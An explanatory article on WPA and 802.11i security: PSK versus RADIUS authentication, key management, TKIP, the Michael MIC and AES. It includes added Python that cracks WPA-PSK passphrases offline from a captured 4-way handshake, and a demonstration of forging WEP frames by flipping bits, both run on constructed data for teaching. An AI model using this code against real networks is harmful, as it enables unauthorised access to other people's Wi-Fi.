The Institute of Electrical & Electronics Engineers (IEEE) 802.11i wireless
networking standard specifies improvements to wireless security. It was
ratified in June 2004 and addresses many of the security issues of the original
802.11 standard, WEP in particular. While 802.11i was still being ratified,
wireless vendors agreed on an interoperable interim standard known as Wi-Fi
Protected Access (WPA), which is based on a draft of 802.11i. WPA is therefore a
subset of 802.11i: it carries forward the 802.1X/EAP key management and the
TKIP cipher, but not the mandatory AES-CCMP cipher of the final standard.
WPA was created by the Wi-Fi Alliance in 2002, in part out of impatience with
the slow-moving 802.11i standard.
Most WEP-era Wi-Fi equipment could be upgraded to WPA with a simple firmware
update (downloaded from the manufacturer), because TKIP was designed to run on
the same RC4 hardware as WEP. Upgrading to the full 802.11i standard (marketed
as WPA2) is a different matter: AES-CCMP usually needs hardware support, so a
firmware update alone is often not enough (see item 5 below).
WPA includes the following five features.
1. WPA authentication
WPA requires the IEEE 802.1X framework for authentication and key distribution.
The original 802.11 standard did not require it; 802.1X could only be layered
on optionally. WPA supports two modes.
For environments without a Remote Authentication Dial-In User Service (RADIUS)
infrastructure, WPA supports the use of a preshared key (PSK): the 256-bit
Pairwise Master Key (PMK) is derived from the passphrase and the network SSID,
so it is the same for every station and every session.
Caution with preshared keys: the 4-way handshake that follows is sent in the
clear, so anyone who captures it can test passphrase guesses offline, and a
short or dictionary passphrase will be recovered. See this article in
Resources/Wireless Networking: WPA - An accident waiting to happen
For environments with a RADIUS infrastructure, the Extensible Authentication
Protocol (EAP) over RADIUS is supported, and the RADIUS server delivers a fresh
PMK for each session.
2. WPA key management
With 802.1X alone, the rekeying of unicast encryption keys is optional.
Additionally, 802.11 and 802.1X provide no mechanism to change the global
encryption key used for multicast and broadcast traffic. With WPA, rekeying of
both unicast and global encryption keys is required. For the unicast encryption
key, the Temporal Key Integrity Protocol (TKIP) derives a different RC4 key for
every frame by mixing the temporal key with the transmitter address and a
per-frame sequence counter; the counter is carried in the frame header, so the
wireless client and the wireless access point (AP) stay synchronized without
any extra exchange. For the global (group) encryption key, WPA includes a
facility for the wireless AP to advertise the changed key to the connected
wireless clients: the group key handshake, in which the new key is sent
encrypted under each client's key encryption key.
3. Temporal Key Integrity Protocol (TKIP)
For 802.11, Wired Equivalent Privacy (WEP) encryption is optional. For WPA,
encryption using TKIP is required. TKIP replaces WEP with a new encryption
scheme that is stronger than WEP but still uses RC4, so it runs on the
calculation facilities present on existing wireless devices. WEP's weaknesses
came mostly from how it keyed RC4: a 24-bit IV that repeats quickly and is
simply concatenated with the secret key, which is what the known key-recovery
attacks exploit. TKIP's 48-bit sequence counter and per-packet key mixing
remove that structure. TKIP also provides for the following:
- The verification of the security configuration after the encryption keys are
determined: the security capabilities each side advertised are echoed inside
the 4-way handshake and must match, so a downgrade cannot go unnoticed.
- The synchronized changing of the unicast encryption key for each frame.
- The determination of a unique starting unicast encryption key for each
preshared key authentication: the pairwise transient key is derived from the
PMK together with both MAC addresses and two fresh random nonces exchanged in
the handshake.
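The key hierarchy behind items 1 to 3, and the reason preshared keys deserve the caution in item 1, as an added worked example in Python (not code from the original page or from any vendor): the passphrase and SSID are stretched into the PMK, the PMK plus both MAC addresses and both handshake nonces give a fresh pairwise transient key (PTK) for each association, and the first 16 bytes of the PTK (the KCK) authenticate the EAPOL-Key handshake messages. Because every input except the passphrase is visible in a captured handshake, the last function runs the offline dictionary attack against a constructed capture. The MAC addresses, nonces, EAPOL frame bytes, passphrase and wordlist are all made up for the example; the PBKDF2 and PRF constructions and the HMAC-MD5 key MIC for key descriptor version 1 (the TKIP case) follow the standard.

```python
"""WPA-PSK key hierarchy and the offline passphrase attack on a captured 4-way handshake.
Added example; all capture data is constructed."""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK mapping from 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    Only 4096 SHA-1 iterations: cheap for the AP, and just as cheap for a cracker."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(...)).
    For TKIP the 64 bytes are KCK(16) || KEK(16) || TK(16) || Michael TX key(8) || Michael RX key(8).
    The nonces make the PTK unique per association even though a PSK-derived PMK never changes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for EAPOL-Key descriptor version 1 (WPA/TKIP): HMAC-MD5 with the KCK over the whole
    EAPOL-Key frame with its MIC field zeroed. Version 2 (CCMP) uses HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.md5).digest()


def build_capture(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for a sniffed handshake: addresses, nonces and the EAPOL-Key message 2
    body are made up; the MIC is what a station that knows `passphrase` would put in message 2."""
    aa = bytes.fromhex("00a0c9000001")       # authenticator (AP) MAC, constructed
    spa = bytes.fromhex("00a0c9000002")      # supplicant (station) MAC, constructed
    anonce = hashlib.sha256(b"anonce-constructed").digest()
    snonce = hashlib.sha256(b"snonce-constructed").digest()
    eapol = (
        b"\x01\x03\x00\x5f"      # EAPOL header: version 1, type EAPOL-Key, body length 95
        + b"\xfe"                # descriptor type 254 = WPA
        + b"\x01\x09"            # key info: version 1 (HMAC-MD5/RC4), pairwise, MIC present
        + b"\x00\x20"            # key length 32
        + bytes(8)               # replay counter
        + snonce                 # key nonce
        + bytes(16 + 8 + 8)      # key IV, RSC, key ID
        + bytes(16)              # key MIC field, zeroed while the MIC is computed
        + b"\x00\x00"            # key data length
    )
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return {"aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack_psk(capture: dict, ssid: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: every input except the passphrase is in the capture, so each
    guess costs one PBKDF2, one PRF-512 and one HMAC, with no interaction with the network."""
    for candidate in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(candidate, ssid), capture["aa"], capture["spa"],
                         capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    cap = build_capture("sunshine", "HomeNet")   # constructed victim network and passphrase
    print(crack_psk(cap, "HomeNet", ["password", "letmein", "sunshine", "dragon"]))
```

Nothing in this attack is specific to TKIP: a WPA2-PSK capture is cracked the same way with the CCMP key sizes and the HMAC-SHA1 key MIC. The only defence a PSK network has is passphrase entropy, which is the point of the article referenced in item 1.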
4. Michael
With 802.11 and WEP, data integrity is provided by a 32-bit integrity check
value (ICV), a CRC-32 that is appended to the 802.11 payload and encrypted with
WEP. Although the ICV is encrypted, it offers no protection against tampering:
CRC-32 is linear and WEP is a stream cipher, so an attacker who flips chosen
bits in the encrypted payload can compute the matching change to the encrypted
ICV without knowing the key, and the receiver accepts the modified frame.
With WPA, a method known as Michael specifies a new algorithm that calculates
an 8-byte message integrity code (MIC) over the frame data and the source and
destination addresses under a 64-bit key, using the calculation facilities
available on existing wireless devices. The MIC is placed between the data
portion of the IEEE 802.11 frame and the 4-byte ICV, and is encrypted together
with the frame data and the ICV. Michael is deliberately lightweight and is
known to be weak on its own, so WPA pairs it with countermeasures: a station
that sees two MIC failures within 60 seconds stops TKIP traffic and forces a
rekey, which limits an attacker to a handful of forgery attempts per minute.
TKIP also provides replay protection. A new 48-bit frame counter (the TKIP
sequence counter) is carried in each IEEE 802.11 frame, and the receiver
discards any frame whose counter is not larger than the last one accepted,
which helps prevent replay attacks.
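The CRC-32 weakness and the Michael fix, as an added example in Python (not code from the original page): a constructed frame is encrypted WEP-style as data || ICV under RC4, an attacker with no key flips a chosen byte and repairs the ICV using the linearity of CRC-32, and the receiver accepts it; with the frame layout described above (data || Michael MIC || ICV) the same flip is caught, because the attacker cannot recompute the keyed MIC. The WEP key, the MIC key and the payload are constructed. The Michael function follows the 802.11i specification (its test vector for an all-zero key and empty message is 82925c1ca1d130b8), but for simplicity it is computed over the data only, without the address fields a real implementation includes.

```python
"""WEP ICV bit-flipping versus a Michael MIC. Added example; keys and payload are constructed."""
import struct
import zlib

MASK32 = 0xFFFFFFFF


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 keystream (WEP keys RC4 with IV||secret, TKIP with a per-packet mixed key)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, body: bytes) -> bytes:
    """WEP construction: (body || CRC-32 ICV) XOR RC4 keystream."""
    icv = struct.pack("<I", zlib.crc32(body))
    return xor(body + icv, rc4_keystream(key, len(body) + 4))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (body, icv_ok)."""
    plain = xor(frame, rc4_keystream(key, len(frame)))
    body, icv = plain[:-4], plain[-4:]
    return body, icv == struct.pack("<I", zlib.crc32(body))


def flip_wep_frame(frame: bytes, delta: bytes) -> bytes:
    """Attacker with no key: XOR delta into the ciphertext body and fix the encrypted ICV.
    CRC-32 is linear, so crc(body ^ delta) == crc(body) ^ crc(delta) ^ crc(zeros of same length)."""
    assert len(delta) == len(frame) - 4
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))
    return xor(frame, delta + struct.pack("<I", icv_delta))


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _ror(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK32


def _xswap(x):
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def _michael_block(l, r):
    r ^= _rol(l, 17); l = (l + r) & MASK32
    r ^= _xswap(l);   l = (l + r) & MASK32
    r ^= _rol(l, 3);  l = (l + r) & MASK32
    r ^= _ror(l, 2);  l = (l + r) & MASK32
    return l, r


def michael(key: bytes, msg: bytes) -> bytes:
    """Michael MIC from 802.11i: 64-bit key, 64-bit tag, only 32-bit adds, XORs and rotates.
    Padding is a 0x5a byte followed by 4 to 7 zero bytes, to a multiple of 4."""
    l, r = struct.unpack("<II", key)
    padded = msg + b"\x5a" + bytes(4 + (3 - len(msg) % 4))
    for (word,) in struct.iter_unpack("<I", padded):
        l ^= word
        l, r = _michael_block(l, r)
    return struct.pack("<II", l, r)


def tkip_like_encrypt(key: bytes, mic_key: bytes, data: bytes) -> bytes:
    """Frame body laid out as in the text: data || 8-byte Michael MIC || 4-byte ICV, all under RC4."""
    return wep_encrypt(key, data + michael(mic_key, data))


def tkip_like_decrypt(key: bytes, mic_key: bytes, frame: bytes):
    """Returns (data, icv_ok, mic_ok)."""
    body, icv_ok = wep_decrypt(key, frame)
    data, mic = body[:-8], body[-8:]
    return data, icv_ok, mic == michael(mic_key, data)


def demo():
    key = b"constructed-wep-key"                   # secret shared by sender and receiver only
    mic_key = bytes.fromhex("0123456789abcdef")    # Michael key, also secret
    data = b"PAY 0100 TO ALICE"
    frame = tkip_like_encrypt(key, mic_key, data)
    delta = bytearray(len(frame) - 4)              # covers data and MIC bytes; MIC bytes left unchanged
    delta[4] = ord("0") ^ ord("9")                 # turn "0100" into "9100" without any key
    forged = flip_wep_frame(frame, bytes(delta))
    return tkip_like_decrypt(key, mic_key, forged)  # ICV passes, Michael fails


if __name__ == "__main__":
    print(demo())
```

With plain WEP the receiver would see only the ICV result, so the forged amount would be accepted; with Michael the MIC mismatch is what triggers the countermeasures described above.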
5. AES support
WPA defines the use of the Advanced Encryption Standard (AES), in the CCMP mode
that 802.11i makes mandatory, as an additional replacement for WEP encryption.
Because AES support usually cannot be added to existing wireless equipment
through a firmware update, support for AES in WPA is optional and is dependent
on vendor driver and hardware support.